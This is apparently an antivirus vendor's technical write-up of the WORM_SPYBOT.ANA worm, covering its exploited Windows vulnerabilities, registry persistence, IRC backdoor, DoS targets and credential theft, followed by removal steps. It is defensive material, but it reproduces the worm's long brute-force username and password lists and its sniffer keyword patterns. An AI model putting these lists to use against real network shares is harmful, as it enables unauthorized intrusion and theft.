WORM_SPYBOT.ANA

Malware type: Worm

Aliases: Backdoor.Win32.Rbot.aph (Kaspersky), W32/Sdbot.worm.gen.g (McAfee), W32.Spybot.Worm (Symantec), EXP/MS05-039.A (Avira), Exp/MS04011-A (Sophos), Backdoor:Win32/Rbot (Microsoft)

In the wild: Yes

Destructive: Yes

Language: English

Platform: Windows NT, 2000, XP, Server 2003

Encrypted: No

Overall risk rating:

Reported infections:

Damage potential:

High

Distribution potential:

High

Infection Channel 1 : Propagates via network shares


Infection Channel 2 : Propagates via software vulnerabilities


Description: 

This memory-resident worm may arrive on an affected computer either as a dropped file of other malware, as a downloaded file from the Internet, or as a manually installed file. It propagates through network shares and exploits known vulnerabilities -- routines which are also employed by other WORM_SPYBOT variants.

The Windows vulnerabilities it exploits are the following:

  • Buffer Overrun in RPC May Allow Code Execution
  • ASN.1 Library Bitstring Heap Overflow vulnerability
  • LSASS Remote Buffer Overflow vulnerability

More information about these vulnerabilities are further discussed in detail in the following Web pages:

In addition, this worm takes advantage of the Veritas Backup Exec Name Service Remote Buffer Overflow vulnerability.

This worm initially performs its backdoor routine by acting as a server program controlled by an Internet Relay Chat (IRC) bot. It then opens random ports and connects to an IRC server. After which, it joins a certain IRC channel, where it listens for malicious commands from a remote user.

Part of its backdoor routine is launching denial of service (DoS) attacks against particular Web sites using flood methods, such as ICMP flood, UDP flood, and PING flood.

This worm also steals the Microsoft Windows Product ID and CD keys of certain gaming applications. It also uses a Carnivore sniffer to retrieve passwords and other sensitive information based on certain strings.

Furthermore, it prevents the affected system from accessing some antivirus sites because it modifies the HOSTS file, a system file that contains host names and IP address mappings.

This WORM_SPYBOT variant is also characterized as a destructive worm since it deletes registry entries.

For additional information about this threat, see:

Description created: Jan. 27, 2006 2:01:42 AM GMT -0800


TECHNICAL DETAILS


File type: PE

Memory resident:  Yes

Size of malware: 271,360 Bytes (compressed)

Ports used: Random

Initial samples received on: Jan 24, 2006

Compression type: Unknown

Vulnerability used:  (MS04-007) ASN.1 Vulnerability Could Allow Code Execution, (MS04-011) Security Update for Microsoft Windows (835732), (MS03-026) Buffer Overrun In RPC Interface Could Allow Code Execution

Payload 1: Modifies HOSTS file

Payload 2: Compromises system security

Payload 3: Performs various denial of service (DoS) attacks

Payload 4: Steals information

Payload 5: Deletes registry entries

Details:

Installation and Autostart Technique

This worm may arrive on an affected computer either as a dropped file of other malware, as a downloaded file from the Internet, or as a manually installed file.

Upon execution, it drops a copy of itself as FIREFOX.EXE in the Windows system folder. Users may mistake this as the legitimate FIREFOX.EXE, an alternative browsing application from Mozilla Firefox.

It then creates the following registry entries to ensure its automatic execution at every system startup:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run
Windows Internet Explorer 6 = "firefox.exe"

HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices
Windows Internet Explorer 6 = "firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\Run
Windows Internet Explorer 6 = "firefox.exe"

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices
Windows Internet Explorer 6 = "firefox.exe"

On the other hand, it deletes the following registry entries if present:

Under the registry key:

HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\
CurrentVersion\RunServices

  • Lavan
  • system32.exe
  • Win2KService
  • WinNETService
  • WinNTService
  • WinXPService

Under the registry key:

HKEY_CURRENT_USER\Software\Microsoft\Windows\
CurrentVersion\Run

  • avserve.exe
  • avserve2.exe
  • Bagle.ao
  • Bagle.av
  • Bagle.ax
  • Bagle.ay
  • Bagle.v
  • JAVA.EXE
  • JavaVM
  • LSASS SVR
  • lsasss.exe
  • Microsoft Inet Xp..
  • Microsoft Update Machine
  • MSBLAST.exe
  • mscvb32.exe
  • mydoom.bb
  • Mydoom.h
  • Mydoom.q
  • napatch.exe
  • Netsky.r
  • PandaAVEngine
  • PandaAVEngine.exe
  • Penis32.exe
  • rxbot
  • Sasser.a
  • Sasser.b
  • Sasser.d
  • Sasser.e
  • Sasser.f
  • Services
  • SERVICES.EXE
  • skynetave.exe
  • Sobig.c
  • Sysformat
  • sysformat.exe
  • sysinfo.exe
  • System MScvb
  • TaskMon
  • taskmon.exe
  • teekids.exe
  • W32.Blaster
  • W32.Blaster.B
  • W32.Blaster.C
  • win_upd2.exe
  • WINdirect.exe
  • windows auto update
  • wingo
  • wingo.exe
  • Winpsd
  • winpsd.exe
  • wintbp.exe
  • Wintbp.exe
  • wuamgrd.exe
  • zotob.e

Propagation Routine

This worm spreads via network shares. It locates and lists down available network shares, where it drops a copy of itself. It also generates IP addresses and attempts to drop a copy of itself in the following default shares of the target address:

  • ADMIN$
  • ADMIN$\system32
  • C$\Windows\system32
  • C$\WinNT\system32
  • IPC$

If these shares are password-protected, it uses any of the following user names and passwords:

User names:

  • Abdulrazak
  • Ackerman
  • Adams
  • Addison
  • Adelstein
  • Adibe
  • Adorno
  • Ahlers
  • Alavi
  • Alcorn
  • Aleks
  • Allison
  • Alongi
  • Altavilla
  • Altenberger
  • Altenhofen
  • Amaral
  • Amatangelo
  • Ameer
  • Amsden
  • Anand
  • Andel
  • Andrelus
  • Andron
  • Anfinrud
  • Ansley
  • Anthony
  • Antos
  • Arbia
  • Arduini
  • Arellano
  • Aristotle
  • Arjas
  • Atkins
  • Augustus
  • Aurelius
  • Axelrod
  • Axworthy
  • Ayiemba
  • Aykroyd
  • Ayling
  • Azima
  • Bachmuth
  • Backus
  • Baglivo
  • Bagnold
  • Bailar
  • Bakanowsky
  • Baleja
  • Ballatori
  • Ballew
  • Baltz
  • Banta
  • Barabesi
  • Barajas
  • Baranczak
  • Baranowska
  • Barberi
  • Barbetti
  • Barneson
  • Barnett
  • Barriola
  • Barry
  • Bartholomew
  • Bartolome
  • Bartoo
  • Basavappa
  • Bashevis
  • Batchelder
  • Baumiller
  • Bayles
  • Beacon
  • Beckman
  • Beder
  • Bedford
  • Behenna
  • Belanger
  • Belaoussof
  • Belfer
  • Belin-Collart
  • Bellavance
  • Bellhouse
  • Bellini
  • Belloc
  • Benedict-Dye
  • Bergson
  • Berke-Jenkins
  • Bernardo
  • Bernassola
  • Bernston
  • Berrizbeitia
  • Betti
  • Beynart
  • Biagioli
  • Bickel
  • Binion
  • Bisema
  • Bisho
  • Blackbourn
  • Blackwell
  • Blagg
  • Blakemore
  • Blanke
  • Bliss
  • Blizard
  • Bloch
  • Bloembergen
  • Bloemhof
  • Bloxham
  • Blyth
  • Bolger
  • Bolick
  • Bollinger
  • Bologna
  • Boner
  • Bonham
  • Boniface
  • Bontempo
  • Bookbinder
  • Boone
  • Boorstin
  • Borack
  • Borden
  • Bossi
  • Bothman
  • Botosh
  • Boudin
  • Boudrot
  • Bourneuf
  • Bowers
  • Boxer
  • Boyajian
  • Boyes
  • Boyland
  • Boyne
  • Bracalente
  • Bradac
  • Bradach
  • Brecht
  • Breed
  • Brenan
  • Brennan
  • Brewer
  • Bridgeman
  • Bridges
  • Brinton
  • Britz
  • Broca
  • Brook
  • Brzycki
  • Buchan
  • Budding
  • Bullard
  • Bunton
  • Burden
  • Burdzy
  • Burke
  • Burridge
  • Busetta
  • Byatt
  • Byerly
  • Calnan
  • Cammelli
  • Cammilleri
  • Canley
  • Capanni
  • Caperton
  • Capocaccia
  • Capodilupo
  • Cappuccio
  • Capursi
  • Caratozzolo
  • Carayannopoulos
  • Carlin
  • Carlos
  • Carlyle
  • Carmichael
  • Caroti
  • Carper
  • Cartmill
  • Cascio
  • Caspar
  • Castelda
  • Cavanagh
  • Cavell
  • Ceniceros
  • Cerioli
  • Chapman
  • Charles
  • Cheang
  • Cherry
  • Chervinsky
  • Chiassino
  • Chien
  • Childress
  • Childs
  • Chinipardaz
  • Chinman
  • Christenson
  • Christian
  • Christiano
  • Christie
  • Christopher
  • Chupasko
  • Church
  • Ciampaglia
  • Cicero
  • Cifarelli
  • Claffey
  • Clancy
  • Clark
  • Clement
  • Clifton
  • Coblenz
  • Coito
  • Coldren
  • Colella
  • Collard
  • Collis
  • Compton
  • Comstock
  • Concino
  • Condodina
  • Connors
  • Corey
  • Cornish
  • Cosmides
  • Counter
  • Coutaux
  • Crawford
  • Crocker
  • Croshaw
  • Croxen
  • Croxton
  • Cunningham
  • Currier
  • Cutler
  • Cyders
  • Daldalian
  • D'Ambra
  • Danieli
  • Dante
  • Dapice
  • D'arcangelo
  • Dasgupta
  • daSilva
  • Daskalu
  • David
  • Dawkins
  • Debroff
  • Defeciani
  • DeGennaro
  • DeLaPena
  • Delattre
  • del'Enclos
  • Deleon-Rendon
  • Delger
  • Dell'acqua
  • Deming
  • Dempster
  • Demusz
  • Denault
  • Denham
  • Denison
  • deRousse
  • Desombre
  • Deutsch
  • D'fini
  • Dicks
  • Diefenbach
  • Difabio
  • Difronzo
  • Dilworth
  • Dionysius
  • Dirksen
  • Dockery
  • Doherty
  • Donahue
  • Donner
  • Doonan
  • Dowsland
  • Drinker
  • D'souza
  • Duffin
  • Durrett
  • Dussault
  • Dwyer
  • Eardley
  • Ebeling
  • Eckel
  • Edley
  • Edner
  • Edward
  • Eickenhorst
  • Eliasson
  • Elmendorf
  • Elmerick
  • Elvis
  • Encinas
  • Enyeart
  • Eppling
  • Erbach
  • Erdman
  • Erdos
  • Espinoza
  • Estes
  • Etter
  • Euripides
  • Everett
  • Fabbris
  • Fagan
  • Faioes
  • Falco-Acosta
  • Falorsi
  • Faris
  • Farone
  • Farren
  • Fasso'
  • Fates
  • Feigenbaum
  • Fejzo
  • Feldman
  • Fernald
  • Fernandes
  • Ferrante
  • Ferriell
  • Feuer
  • Field
  • Finkelstein
  • Finnegan
  • Fiorina
  • Fitzmaurice
  • Flier
  • Flores
  • Folks
  • Forester
  • Fortes
  • Fortier
  • Fossey
  • Fossi
  • Francisco
  • Franklin-Kenea
  • Franz
  • Frazier-Davis
  • Freid
  • Freundlich
  • Fried
  • Friedland
  • Frisken
  • Frowiss
  • Fryberger
  • Fujii-Abe
  • Fuller
  • Furth
  • Fusaro
  • Gabrielli
  • Gaggiotti
  • Galeotti
  • Galwey
  • Gambini
  • Garfield
  • Garman
  • Garonna
  • Geller
  • Gemberling
  • Georgi
  • Gerrett
  • Ghorai
  • Gibbens
  • Gibson
  • Gilbert
  • Gillispie
  • Gleason
  • Glegg
  • Glendon
  • Goldfarb
  • Goncalves
  • Gonzalez
  • Goodearl
  • Goody
  • Gozzi
  • Gravell
  • Greenberg
  • Greenfeld
  • Griffiths
  • Grigoletto
  • Grummell
  • Gruner
  • Gruppe
  • Guenthart
  • Hackman
  • Hackshaw
  • Haley
  • Halkias
  • Hallowell
  • Halpert
  • Hambarzumjan
  • Hamer
  • Hammerness
  • Hanssen
  • Harding
  • Hargraves
  • Harlow
  • Harrigan
  • Hartman
  • Hartmann
  • Hartnett
  • Harwell
  • Haviaras
  • Hawkes
  • Hayes
  • Haynes
  • Hazlewood
  • Heermans
  • Heiland
  • Hellman
  • Hellmiss
  • Helprin
  • Hemphill
  • Henery
  • Henrichs
  • Hernandez
  • Herrera
  • Hester
  • Heubert
  • Heyeck
  • Himmelfarb
  • Hirst
  • Hitchcock
  • Hoang
  • Hoffer
  • Hoffman
  • Hokanson
  • Hokoda
  • Holmes
  • Holoien
  • Holter
  • Holway
  • Holzman
  • Hooker
  • Hopkins
  • Horsley
  • Hoshida
  • Hostage
  • Hottle
  • Howard
  • Huidekoper
  • Hungerford
  • Huntington
  • Hurtubise
  • Hutchings
  • Iaquinta
  • Ichikawa
  • Igarashi
  • Inamura
  • Inniss
  • Isaac
  • Isaievych
  • Isbill
  • Isserman
  • Jacenko
  • Jackson
  • Jagers
  • Jagger
  • Jagoe
  • Jamil
  • Janjigian
  • Jarnagin
  • Jarrell
  • Jeffers
  • Jellis
  • Jenkins
  • Jespersen
  • Jewett
  • Johannesson
  • Johannsen
  • Johns
  • Jolly
  • Jorgensen
  • Jucks
  • Juliano
  • Julious
  • Kabbash
  • Kaboolian
  • Kafadar
  • Kalbfleisch
  • Kaligian
  • Kalil
  • Kalinowski
  • Kalman
  • Kamel
  • Kangis
  • Karpouzes
  • Kassower
  • Kasten
  • Kawachi
  • Keenan
  • Keepper
  • Keith
  • Kelker
  • Kelsey
  • Kempton
  • Kemsley
  • Kendall
  • Kerry
  • Khong
  • Kimmel
  • Kimmett
  • Kimura
  • Kindall
  • Kinsley
  • Kippenberger
  • Kirscht
  • Kittridge
  • Kleckner
  • Kleiman
  • Kleinfelder
  • Klemperer
  • Kling
  • Klinkenborg
  • Klint
  • Knuff
  • Kobrick
  • Koivumaki
  • Kommer
  • Koniaris
  • Konrad
  • Korzybski
  • Kotter
  • Kovaks
  • Kraemer
  • Krailo
  • Krasney
  • Kraus
  • Kroemer
  • Krysiak
  • Kuenzli
  • Kumar
  • Kusman
  • Kuwabara
  • Labunka
  • Lafler
  • Laing
  • Lallemant
  • Landes
  • Lankes
  • Lantieri
  • Lanzit
  • Laserna
  • Lashley
  • Lawless
  • Lecar
  • Lecce
  • Leclercq
  • Leite
  • Lenard
  • l'Enclos
  • Lesser
  • Lessi
  • Liakos
  • Lidano
  • Light
  • Lightfoot
  • Linares
  • Linda
  • Linder
  • Linehan
  • Linzee
  • Lippmann
  • Lipponen
  • Little
  • Litvak
  • Livernash
  • Livolsi
  • Lizardo
  • Locatelli
  • Longworth
  • Loveman
  • Lowenstein
  • Lubin
  • Lucas
  • Luciano
  • Luczkow
  • Luecke
  • Lunetta
  • Luoma
  • Lussier
  • Lutcavage
  • Luzader
  • Maccormac
  • Macdonald
  • Maceachern
  • Macintyre
  • Mackenney
  • MacMillan
  • Madigan
  • Maggio
  • Mahony
  • Maier
  • Maine-Hershey
  • Maisano
  • Malatesta
  • Maller
  • Malova
  • Manalis
  • Mandel
  • Manganiello
  • Mantovan
  • March
  • Marchbanks
  • Marcus
  • Margalit
  • Margetts
  • Marques
  • Martinez
  • Martochio
  • Marton
  • Marubini
  • Matalka
  • Matarazzo
  • Matsukata
  • Mattson
  • Mauzy
  • Mazzali
  • Mazziotta
  • Mcbride
  • Mccaffery
  • Mccall
  • Mcclearn
  • Mcdowell
  • Mcelroy
  • McFadden
  • Mcghee
  • Mcgoldrick
  • McIlroy
  • Mcintosh
  • Mckenna
  • Mclane
  • Mclaren
  • Mcnealy
  • Mcnulty
  • Meccariello
  • Memisoglu
  • Menzies
  • Merikoski
  • Merlani
  • Merminod
  • Merseth
  • Metelka
  • Metropolis
  • Meurer
  • Michelman
  • Middle
  • Mieher
  • Mills
  • Minichiello
  • Mitropoulos
  • Mittal
  • Mocroft
  • Modestino
  • Moeller
  • Moiamedi
  • Monque
  • Montilio
  • MooreDeCh.
  • Morani
  • Moreton
  • Morrison
  • Morrow
  • Mortimer
  • Mosher
  • Mosler
  • Mostafavi
  • Motooka
  • Mudarri
  • Muello
  • Mugnai
  • Mulkern
  • Mulroy
  • Mumford
  • Mussachio
  • Naddeo
  • Napolitano
  • Nardi
  • Nardone
  • Naviaux
  • Nayduch
  • Nelson
  • Nenna
  • Nesci
  • Neuman
  • Newfeld
  • Newlin
  • Nickerson
  • Nickoloff
  • Nisenson
  • Nitabach
  • Notman
  • Nuzum
  • Ocougne
  • Ogata
  • O'hagan
  • Oldford
  • Olsen
  • Olson
  • Olszewski
  • O'malley
  • O'meara
  • Orfield
  • Ospina
  • Ostrowski
  • Ottaviani
  • Otten
  • Ouchida
  • PaesDealmeida
  • Paine
  • Palayoor
  • Palepu
  • Pallara
  • Palmitesta
  • Panadero
  • Panizzon
  • Pantilla
  • Paoletti
  • Parmeggiani
  • Parris
  • Partridge
  • Pascucci
  • Patefield
  • Patrick
  • Pattullo
  • Pavetti
  • Pavlon
  • Pawloski
  • Paynter
  • Peabody
  • Pearlberg
  • Pederson
  • Peishel
  • Penny
  • Pereira
  • Perko
  • Perlak
  • Perlman
  • Perna
  • Perone
  • Perrimon
  • Peters
  • Petruzello
  • Pettibone
  • Pettit
  • Pfister
  • Pilbeam
  • Pinot
  • Plancon
  • Plant
  • Plasket
  • Plous
  • Pocobene
  • Poincaire
  • Pointer
  • Poirier
  • Polak
  • Polanyi
  • Politis
  • Poolman
  • Powers
  • Presper
  • Preucel
  • Prevost
  • Pritchard
  • Pritz
  • Proietti
  • Prothrow-Stith
  • Puccia
  • Pynchon
  • Quaday
  • Quetin
  • Rabkin
  • Radeke
  • Rajagopalan
  • Raney
  • Rangan
  • Rankin
  • Rapple
  • Rayport
  • Redden-Tyler
  • Reedquist
  • Reinold
  • Remak
  • Renick
  • Repetto
  • Resnik
  • Richmond
  • Rielly
  • Rindos
  • Rineer
  • Rivera
  • Robinson
  • Rocha
  • Roesler
  • Rogers
  • Ronen
  • Royal
  • Ruderman
  • Ruescher
  • Sabatello
  • Sadler
  • Safire
  • Samson
  • Sanchez-Ramirez
  • Sanna
  • Sapers
  • Sarin
  • Sartore
  • Satin
  • Satta
  • Satterthwaite
  • Sawtell
  • Sayied
  • Scarponi
  • Scepan
  • Scharf
  • Scharlemann
  • Scheiner
  • Schiano
  • Schifini
  • Schilling
  • Schmitt
  • Schossberger
  • Schuman
  • Schutte
  • Schuyler
  • Schwan
  • Schwickrath
  • Scovel
  • Scudder
  • Seaton
  • Seeber
  • Segal
  • Sekler
  • Selvage
  • Sennett
  • Seterdahl
  • Sexton
  • Seyfert
  • Shaikh
  • Shakis
  • Shankland
  • Shanley
  • Shatrov
  • Shavelson
  • Sheats
  • Shepherd
  • Sheppard
  • Shepstone
  • Shesko
  • Shibata
  • Shimon
  • Siesto
  • Sigalot
  • Sigini
  • Signa
  • Silverman
  • Silvetti
  • Sinsabaugh
  • Sirilli
  • Sites
  • Skane
  • Skerry
  • Skoda
  • Sloan
  • Slowe
  • Smilow
  • Sniffen
  • Snodgrass
  • Socolow
  • Solon
  • Somers
  • Sommariva
  • Sorabella
  • Sottak
  • Soukup
  • Soule
  • Soultanian
  • Spanier
  • Sparrow
  • Spaulding
  • Speizer
  • Spence
  • Sperber
  • Spicer
  • Spiegelhalter
  • Spiliotis
  • Spinrad
  • Stalvey
  • Stang
  • Stassinopolus
  • States
  • Statlender
  • Stefani
  • Steiner
  • Stephanian
  • Stepniewska
  • Stewart-Oaten
  • Stiepock
  • Stillwell
  • StMartin
  • Stock
  • Stockton
  • Stockwell
  • Stolzenberg
  • Stonich
  • Storer
  • Stott
  • Strange
  • Strauch
  • Streiff
  • Stringer
  • Sullivan
  • Sumner
  • Surdam
  • Sweeting
  • Sweetser
  • Swindle
  • Tagiuri
  • Talaugon
  • Tambiah
  • Tandler
  • Tanowitz
  • Tatar
  • Taveras
  • Tcherepnin
  • Teague
  • Temes
  • Temmer
  • Tenney
  • Terracini
  • Thavaneswaran
  • Theodos
  • Thibault
  • Thisted
  • Thomsen
  • Throop
  • Tierney
  • Timmons
  • Tofallis
  • Tollestrup
  • Tolls
  • Tolman
  • Tomford
  • Toomer
  • Topulos
  • Torresi
  • Torske
  • Towler
  • Traebert
  • Trenga
  • Trewin
  • Tringali
  • Troiani
  • Truss
  • Tsiatis
  • Tsomides
  • Tsukurov
  • Tudge
  • Tukan
  • Turano
  • Turek
  • Tuttle
  • Twells
  • Tzamarias
  • Ullman
  • Untermeyer
  • Upsdell
  • Urban
  • Urdang-Brown
  • Usdan
  • Uzuner
  • Vacca
  • Valberg
  • Valencia
  • vanAllen
  • Vandenberg
  • Vanheeckeren
  • VanZwet
  • Vasquez
  • Velasquez
  • Venne
  • Verghese
  • Viana
  • Viano
  • Viens
  • Vignola
  • Villarreal
  • Vitali
  • Viviani
  • Voigt
  • VonHoffman
  • Vorhaus
  • Votey
  • Waite
  • Wales
  • Wallenberg
  • Walter
  • Warshafsky
  • Wasowska
  • Waugh
  • Weighart
  • Weingarten
  • Weinhaus
  • Weissbourd
  • Weissman
  • Welles
  • Welsh
  • Wengret
  • Wescott
  • Wetzel
  • Whately
  • Whilton
  • White
  • Whitla
  • Whittaker
  • Wiedersheim
  • Wiener
  • Wilder
  • Wilhelm
  • Wilkin
  • Wilkinson
  • Willstatter
  • Wilson
  • Wooden
  • Woods
  • Woods-Powell
  • Yacono
  • Yamane
  • Yankee
  • Yarchuk
  • Yates
  • Ybarra
  • Yedidia
  • Yesson
  • Yetiv
  • Yoffe
  • Youk-See
  • Zachary
  • Zahedi
  • Zangwill
  • Zegans
  • Zerbini
  • Zoldak
  • Zucconi
  • Zwiers
  • Zytowski

Passwords:

  • 000000
  • 00000000
  • 12345
  • 54321
  • 111111
  • 123456
  • 654321
  • 888888
  • 1234567
  • 11111111
  • 12345678
  • 88888888
  • 0wner
  • 1234qwer
  • 123abc
  • 123asd
  • 123qwe
  • abc123
  • account
  • admin
  • administrador
  • administrat
  • administrateur
  • administrator
  • admins
  • alpha
  • asdfgh
  • Colin
  • command
  • Commander
  • computer
  • Convidado
  • coordinatore
  • database
  • debug
  • default
  • devil
  • Exploited
  • family
  • Fucked
  • Fucker
  • George
  • glass
  • godblessyou
  • government
  • guest
  • Hacked
  • Hacker
  • hotel
  • ihavenopass
  • Internet
  • Inviter
  • Jessus
  • jesus
  • kanri
  • kanri-sha
  • killer
  • Lamer
  • login
  • lover
  • mainhelp
  • manager
  • microsoft
  • monitor
  • Mossad
  • mossaf
  • mysql
  • Nancy
  • network
  • oracle
  • oscar
  • Ospite
  • owner
  • paltalk
  • Paltalk
  • passwd
  • password
  • Pepsi
  • Peter
  • power
  • private
  • public
  • school
  • secret
  • security
  • service
  • services
  • soldier
  • Spider
  • Sserver
  • Stacey
  • Stacy
  • Standard
  • Stefan
  • Steve
  • Steven
  • student
  • Sucker
  • super
  • sybase
  • teacher
  • telnet
  • tivoli
  • Tommy
  • Verwalter
  • Win2003
  • windows
  • WinNt
  • WinXp
  • wwwadmin

Exploits Used

This worm exploits the following Windows vulnerabilities to propagate across networks:

  • Buffer Overrun in RPC May Allow Code Execution
  • ASN.1 Library Bitstring Heap Overflow vulnerability
  • LSASS Remote Buffer Overflow vulnerability

More information about these vulnerabilities are further discussed in detail in the following Web pages:

Moreover, this worm takes advantage of the Veritas Backup Exec Name Service Remote Buffer Overflow vulnerability.

Backdoor Routine

This worm acts as a server program controlled by an Internet Relay Chat (IRC) bot. It opens random ports and connects to an IRC server. It then joins certain IRC channel and once connected, this server program receives commands from the IRC bot. The following commands are used to control the target system and the behavior of the server program:

  • Change the bot's nick
  • Display bot status
  • Display information or messages from a remote user
  • Display system information
  • Display the identification of current code
  • Download and execute files from an FTP or HTTP site
  • Enable and delete shares
  • Enable and disable DCOM
  • Flush DNS cache
  • Generate a new random nick for the bot
  • Log keystrokes
  • Open a file
  • Perform packet sniffing for specific strings
  • Print network information when host matches
  • Resolve IP or host name by DNS
  • Run an MS-DOS command
  • Terminate itself

Denial of Service Attack

Part of this worm's backdoor capabilities is launching a denial of service (DoS) attack against the following Web sites using the following flooding methods:

Web sites:

  • de.yahoo.com
  • nitro.ucsc.edu
  • verio.fr
  • www.1und1.de
  • www.above.net
  • www.belwue.de
  • www.burst.net
  • www.cogentco.com
  • www.d1asia.com
  • www.easynews.com
  • www.google.com
  • www.level3.com
  • www.lib.nthu.edu.tw
  • www.nifty.com
  • www.nocster.com
  • www.rit.edu
  • www.schlund.net
  • www.st.lib.keio.ac.jp
  • www.stanford.edu
  • www.switch.ch
  • www.utwente.nl
  • www.verio.com
  • www.xo.net
  • yahoo.co.jp

Flooding methods:

  • DDoS flood
  • ICMP flood
  • PING flood
  • SKYSYN flood
  • SYN flood
  • UDP flood

HOSTS File Modification

This worm modifies the Windows HOSTS file located in %System%\Drivers\etc folder by appending a list of Web site addresses that are directed to the loopback address 127.0.0.1.

(Note: %System% is the Windows system folder, which is usually C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)

As a result, affected users are redirected to the local machines whenever they attempt to access the following Web sites that are usually related to antivirus companies:

  • avp.com
  • ca.com
  • customer.symantec.com
  • dispatch.mcafee.com
  • download.mcafee.com
  • f-secure.com
  • kaspersky.com
  • kaspersky-labs.com
  • liveupdate.symantec.com
  • liveupdate.symantecliveupdate.com
  • mast.mcafee.com
  • mcafee.com
  • my-etrust.com
  • nai.com
  • networkassociates.com
  • rads.mcafee.com
  • secure.nai.com
  • securityresponse.symantec.com
  • sophos.com
  • symantec.com
  • trendmicro.com
  • update.symantec.com
  • updates.symantec.com
  • us.mcafee.com
  • viruslist.com
  • www.avp.com
  • www.ca.com
  • www.f-secure.com
  • www.grisoft.com
  • www.kaspersky.com
  • www.mcafee.com
  • www.my-etrust.com
  • www.nai.com
  • www.networkassociates.com
  • www.sophos.com
  • www.symantec.com
  • www.trendmicro.com
  • www.viruslist.com

Information Theft

This worm also steals the Microsoft Windows Product ID and CD keys from the following games:

  • Battlefield 1942
  • Battlefield 1942 (Road To Rome)
  • Battlefield 1942 (Secret Weapons of WWII)
  • Battlefield Vietnam
  • Black and White
  • Chrome
  • Command and Conquer: Generals
  • Command and Conquer: Generals (Zero Hour)
  • Command and Conquer: Red Alert
  • Command and Conquer: Red Alert 2
  • Command and Conquer: Tiberian Sun
  • Counter-Strike (Retail)
  • FIFA 2002
  • FIFA 2003
  • Freedom Force
  • Global Operations
  • Gunman Chronicles
  • Half-Life
  • Hidden & Dangerous 2
  • IGI 2: Covert Strike
  • Industry Giant 2
  • James Bond 007: Nightfire
  • Legends of Might and Magic
  • Medal of Honor: Allied Assault
  • Medal of Honor: Allied Assault: Breakthrough
  • Medal of Honor: Allied Assault: Spearhead
  • Microsoft Windows Product ID
  • Nascar Racing 2002
  • Nascar Racing 2003
  • Need For Speed Hot Pursuit 2
  • Need For Speed: Underground
  • Neverwinter Nights
  • Neverwinter Nights (Hordes of the Underdark)
  • Neverwinter Nights (Shadows of Undrentide)
  • NHL 2002
  • NHL 2003
  • NOX
  • Rainbow Six III RavenShield
  • Shogun: Total War: Warlord Edition
  • Soldier of Fortune II - Double Helix
  • Soldiers Of Anarchy
  • The Gladiators
  • Unreal Tournament 2003
  • Unreal Tournament 2004

It also uses a Carnivore sniffer to retrieve passwords and other sensitive information based on the following strings:

  • CDKey
  • : auth
  • : login
  • :!auth
  • :!hashin
  • :!login
  • :!secure
  • :!syn
  • :$auth
  • :$hashin
  • :$login
  • :$syn
  • :%auth
  • :%hashin
  • :%login
  • :%syn
  • :&auth
  • :&login
  • :*auth
  • :*login
  • :,auth
  • :,login
  • :.auth
  • :.hashin
  • :.login
  • :.secure
  • :.syn
  • :/auth
  • :/login
  • :?auth
  • :?login
  • :@auth
  • :@login
  • :\auth
  • :\login
  • :~auth
  • :~login
  • :%20auth
  • :%20login
  • :=auth
  • :=login
  • :'auth
  • :-auth
  • :'login
  • :-login
  • JOIN #
  • login
  • NICK
  • OPER
  • oper
  • PASS
  • paypal
  • PAYPAL
  • paypal.com
  • PAYPAL.COM
  • USER

Platforms Affected

This worm affects computers running on Windows NT, 2000, XP, and Server 2003.

Analysis By: Zeus M. Laguerta


SOLUTION


Minimum scan engine version needed: 7.000

Pattern file needed: 3.176.03

Pattern release date: Jan 25, 2006


Important note: The "Minimum scan engine" refers to the earliest Trend Micro scan engine version guaranteed to detect this threat. However, Trend Micro strongly recommends that you update to the latest version in order to get comprehensive protection. Download the latest scan engine here.

Solution:

Terminating the Malware Program

Since this malware uses a file name that is also the file name of a legitimate process, it is necessary to use third party process viewers such as Process Explorer, to isolate the malware process itself.

If the process you are looking for is not in the list displayed by Process Explorer, proceed to the succeeding solution set.

  1. Download Process Explorer.
  2. Extract the contents of the compressed (ZIP) file to a location of your choice.
  3. Execute Process Explorer by double-clicking procexp.exe.
  4. In the Process Explorer window, locate the process:
    FIREFOX.EXE
  5. Right-click the malware process, and choose Properties.
  6. Check if the value for the Current Directory is the following:
    %System%
    (Note: %System% is the Windows system folder, which is usually C:\WINNT\System32 on Windows NT and 2000, or C:\Windows\System32 on Windows XP and Server 2003.)
  7. If yes, then right-click on the malware process, and click Kill Process Tree.
  8. Close Process Explorer.

*NOTE: On computers running all Windows platforms, if the process you are looking for is not in the list displayed by Process Explorer, continue with the next solution procedure, noting additional instructions. If the malware process is in the list displayed by Process Explorer, but you are unable to terminate it, restart your computer in safe mode.

Editing the Registry

This malware modifies the computer's registry. Users affected by this malware may need to modify or delete specific registry keys or entries. For detailed information regarding registry editing, please refer to the following articles from Microsoft:

  1. HOW TO: Backup, Edit, and Restore the Registry in Windows NT 4.0
  2. HOW TO: Backup, Edit, and Restore the Registry in Windows 2000
  3. HOW TO: Back Up, Edit, and Restore the Registry in Windows XP and Server 2003

Removing Autostart Entries from the Registry

Removing autostart entries from the registry prevents the malware from executing at startup.

If the registry entries below are not found, the malware may not have executed as of detection. If so, proceed to the succeeding solution set.

  1. Open Registry Editor. Click Start>Run, type REGEDIT, then press Enter.
  2. In the left panel, double-click the following:
    HKEY_CURRENT_USER>Software>Microsoft>
    Windows>CurrentVersion>Run
  3. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  4. In the left panel, double-click the following:
    HKEY_CURRENT_USER>SOFTWARE>Microsoft>
    Windows>CurrentVersion>RunServices
  5. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  6. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>
    Windows>CurrentVersion>Run
  7. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  8. In the left panel, double-click the following:
    HKEY_LOCAL_MACHINE>SOFTWARE>Microsoft>
    Windows>CurrentVersion>RunServices
  9. In the right panel, locate and delete the entry:
    Windows Internet Explorer 6 = "firefox.exe"
  10. Close Registry Editor.

Removing Malware Entries from the HOSTS File

